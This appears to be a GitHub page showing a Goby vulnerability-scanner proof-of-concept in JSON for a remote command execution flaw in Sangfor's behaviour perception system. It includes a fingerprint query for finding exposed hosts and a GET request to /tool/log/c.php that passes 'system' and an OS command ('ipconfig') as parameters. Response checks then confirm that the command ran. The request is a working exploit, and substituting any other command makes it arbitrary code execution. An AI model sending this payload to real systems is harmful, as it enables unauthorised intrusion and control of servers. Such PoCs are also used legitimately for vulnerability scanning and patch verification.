-
Notifications
You must be signed in to change notification settings - Fork 197
/
sangfor_Behavior_perception_system_c.php_RCE.json
60 lines (60 loc) · 2.27 KB
/
sangfor_Behavior_perception_system_c.php_RCE.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
{
"Name": "深信服 行为感知系统 c.php 远程命令执行漏洞",
"Level": "3",
"Tags": [
"RCE"
],
"GobyQuery": "body=\"isHighPerformance : !!SFIsHighPerformance,\"",
"Description": "深信服 行为感知系统 c.php 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行",
"Product": "深信服 行为感知系统",
"Homepage": "",
"Author": "peiqi",
"Impact": "",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech/Goby%20&%20POC.html?q="
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/tool/log/c.php?strip_slashes=system&host=ipconfig",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "OR",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Windows IP",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "IPv6",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-06-04 10:11:18",
"GobyVersion": "1.8.268"
}